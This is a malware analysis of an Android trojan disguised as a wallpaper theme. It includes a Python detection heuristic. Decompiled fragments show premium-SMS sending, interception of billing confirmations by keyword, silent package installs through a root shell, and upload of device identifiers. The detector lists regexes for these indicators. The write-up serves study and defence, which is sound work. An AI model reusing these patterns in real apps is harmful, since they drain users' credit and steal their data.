I. Introduction to Android trojans
Android is more open than the iPhone system: it allows third-party applications to be installed, even ones that were never approved by Google's Android Market, but this openness also appears to increase the security risk. Malware-infected applications have been found on Android Market itself, although users can protect themselves, as they do on a PC, by installing anti-virus software.
II. Overview

Once installed, the program presents itself as a desktop theme that can set wallpapers and the like. When run, it obtains root privileges and downloads and installs packages without the user's consent; it sends premium-rate SMS to subscribe to SP (service provider) services and intercepts the returned billing confirmation messages, maliciously consuming the user's credit; and it steals private data such as the user's contacts and uploads it to a server.
III. Sample characteristics
1. Sensitive permissions

    <uses-permission android:name="android.permission.DELETE_PACKAGES" />
    <uses-permission android:name="android.permission.INSTALL_PACKAGES" />
    <uses-permission android:name="android.permission.READ_CONTACTS" />

Intent actions referenced by the sample:

    android.setting.START_SEND_SMS
    android.setting.SMS_SENT
    android.provider.Telephony.SMS_RECEIVED
2. Entry point and malicious modules

    public class MyReceiver extends BroadcastReceiver { ... }

(1) Sending and intercepting SMS:

    String str39 = "android.setting.SMS_SENT";
    try
    {
        // Replies to the originating number with a multipart text message
        String str41 = arrayOfSmsMessage[i13].getOriginatingAddress();
        localSmsManager4.sendMultipartTextMessage(str41, null, localArrayList5, localArrayList7, null);
    }
    if (!paramIntent.getAction().equals("android.provider.Telephony.SMS_RECEIVED"))
    // Incoming messages from the SP number, or whose body carries billing keywords
    // ("customer service", "tariff", "1.00 yuan", "yuan per message", "yuan per use"),
    // are swallowed with abortBroadcast() so the user never sees the fee confirmation.
    if ((arrayOfSmsMessage[i13].getOriginatingAddress().contains("10658166")) ||
        (arrayOfSmsMessage[i13].getMessageBody().contains("83589523")) ||
        (arrayOfSmsMessage[i13].getMessageBody().contains("客服")) ||
        (arrayOfSmsMessage[i13].getMessageBody().contains("资费")) ||
        (arrayOfSmsMessage[i13].getMessageBody().contains("1.00元")) ||
        (arrayOfSmsMessage[i13].getMessageBody().contains("2.00元")) ||
        (arrayOfSmsMessage[i13].getMessageBody().contains("元/条")) ||
        (arrayOfSmsMessage[i13].getMessageBody().contains("元/次")))
        abortBroadcast();

(2) Obtaining root and installing/uninstalling packages:
    private void installApk(String paramString1, String paramString2)
    try
    {
        // Silent install through a root shell: "sudo pm install -r" on a file in the app's data directory
        Runtime localRuntime = Runtime.getRuntime();
        StringBuilder localStringBuilder = new StringBuilder("sudo pm install -r ");
        File localFile2 = this.mContext.getFilesDir();
        String str = localFile2 + "/" + paramString2;
        Process localProcess = localRuntime.exec(str);
    }

    private void installAPK()

    private void uninstallPlugin()
    {
        try
        {
            int i = Log.d("agui", "uninstall");
            // Removes the plugin package, then restarts the background service
            Process localProcess = Runtime.getRuntime().exec("pm uninstall -r com.newline.root");
            Intent localIntent1 = new Intent("android.intent.action.RUN");
            Context localContext = this.mContext;
            Intent localIntent2 = localIntent1.setClass(localContext, MyService.class);
            ComponentName localComponentName = this.mContext.startService(localIntent1);
            return;
        }
    }

(3) Stealing and uploading private data:
    // Device identifiers (IMSI, IMEI, ICCID, phone number) and app/user identifiers
    // are packed into a hashtable and handed to NetTask for upload.
    String str8 = Long.toString(System.currentTimeMillis());
    Object localObject1 = localHashtable.put("id", str8);
    Object localObject2 = localHashtable.put("imsi", str4);
    Object localObject3 = localHashtable.put("imei", str5);
    Object localObject4 = localHashtable.put("iccid", str6);
    Object localObject5 = localHashtable.put("mobile", str7);
    String str9 = TimeUtil.dateToString(new Date(), "yyyyMMddHHmmss");
    Object localObject6 = localHashtable.put("ctime", str9);
    Object localObject7 = localHashtable.put("osver", "1");
    Object localObject8 = localHashtable.put("cver", "010101");
    Object localObject9 = localHashtable.put("uid", str1);
    Object localObject10 = localHashtable.put("bid", str2);
    Object localObject11 = localHashtable.put("pid", str3);
    Object localObject12 = localHashtable.put("softid", paramString2);
    MessageService.4 local4 = new MessageService.4(this, paramIResponseListener);
    NetTask localNetTask = new NetTask(localHashtable, "utf-8", 0, local4);
    String[] arrayOfString = new String[1];
    arrayOfString[0] = paramString1;
    AsyncTask localAsyncTask = localNetTask.execute(arrayOfString);

    // NetTask: the collected data is sent to the server with a plain HTTP GET
    public class NetTask extends AsyncTask<String, Integer, String>
    protected String doInBackground(String[] paramArrayOfString)
    URL localURL1 = new java/net/URL;
    String str5 = localStringBuffer1.toString();
    URL localURL2 = localURL1;
    String str6 = str5;
    localURL2.<init>(str6);
    localHttpURLConnection = (HttpURLConnection) localURL1.openConnection();
    localHttpURLConnection.setRequestMethod("GET");
    localHttpURLConnection.setConnectTimeout(5000);
    localHttpURLConnection.setReadTimeout(5000);
3. Sensitive strings

    "sudo pm install -r"
    installAPK();
    contains("10658166")
    contains("83589523")
    contains("客服")
    contains("资费")
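A static triage heuristic, added here as an example (not part of the original analysis or the sample's code), that correlates the manifest permissions from section 1 with the sensitive strings from section 3 so that each finding needs both a manifest fact and a code indicator. The manifest and source fragment it scans are constructed, and the indicator names and regexes are my own assumptions.

```python
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"
# INSTALL/DELETE_PACKAGES are reserved for system-signed apps; a wallpaper theme asking for them next to READ_CONTACTS is the combination this sample shows.
PRIVILEGED = {"android.permission.INSTALL_PACKAGES", "android.permission.DELETE_PACKAGES"}
CONTACTS = "android.permission.READ_CONTACTS"
# Code-level indicators taken from the write-up's sensitive-string list (regexes are assumptions).
CODE_INDICATORS = {
    "root_install": re.compile(r"\bsu(?:do)?\b.*pm install -r"),
    "sms_abort":    re.compile(r"abortBroadcast\s*\("),
    "sp_numbers":   re.compile(r"10658166|83589523"),
    "fee_keywords": re.compile(r"客服|资费|元/条|元/次|\d\.\d\d元"),
    "device_ids":   re.compile(r'put\("(?:imsi|imei|iccid)"'),
}

def manifest_facts(manifest_xml):
    """Return (requested permissions, receiver intent actions) from a decoded manifest."""
    root = ET.fromstring(manifest_xml)
    perms = {e.get(ANDROID_NS + "name") for e in root.iter("uses-permission")}
    actions = {a.get(ANDROID_NS + "name")
               for r in root.iter("receiver") for a in r.iter("action")}
    return perms, actions

def scan_sample(manifest_xml, decompiled_src):
    """Correlate manifest facts with code indicators; each finding needs both sides."""
    perms, actions = manifest_facts(manifest_xml)
    hits = {k for k, rx in CODE_INDICATORS.items() if rx.search(decompiled_src)}
    findings = []
    if perms & PRIVILEGED and "root_install" in hits:
        findings.append("silent-install")            # root shell + pm install -r
    if SMS_RECEIVED in actions and "sms_abort" in hits and hits & {"fee_keywords", "sp_numbers"}:
        findings.append("billing-sms-interception")  # receiver swallows fee confirmations
    if CONTACTS in perms and "device_ids" in hits:
        findings.append("identity-exfiltration")     # IMSI/IMEI/ICCID collected for upload
    return findings

# Constructed test inputs modelled on the write-up (not taken from the real sample).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android">
<uses-permission android:name="android.permission.INSTALL_PACKAGES"/><uses-permission android:name="android.permission.DELETE_PACKAGES"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<application><receiver android:name=".MyReceiver"><intent-filter android:priority="1000">
<action android:name="android.provider.Telephony.SMS_RECEIVED"/></intent-filter></receiver></application></manifest>"""
SAMPLE_SRC = """new StringBuilder("sudo pm install -r ");
if (m.getMessageBody().contains("资费") || m.getMessageBody().contains("1.00元")) abortBroadcast();
localHashtable.put("imsi", str4); localHashtable.put("imei", str5);"""

if __name__ == "__main__":
    print(scan_sample(SAMPLE_MANIFEST, SAMPLE_SRC))
```

Requiring a manifest fact and a code indicator together keeps a plain SMS app that legitimately calls abortBroadcast(), or a theme that merely reads contacts, from being flagged.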
IV. Behaviour analysis
When run, the sample obtains root privileges and downloads and installs packages without consent; it sends premium-rate SMS to subscribe to SP services and intercepts the returned billing confirmation messages, maliciously consuming the user's credit; and it steals private data such as the user's contacts and uploads it to a server.
Everything described in this article was tested locally or with the authorization of the target and is intended to provide educational and research information; key sensitive details and code have been removed to prevent malicious use. The author does not encourage or support any form of illegal activity.
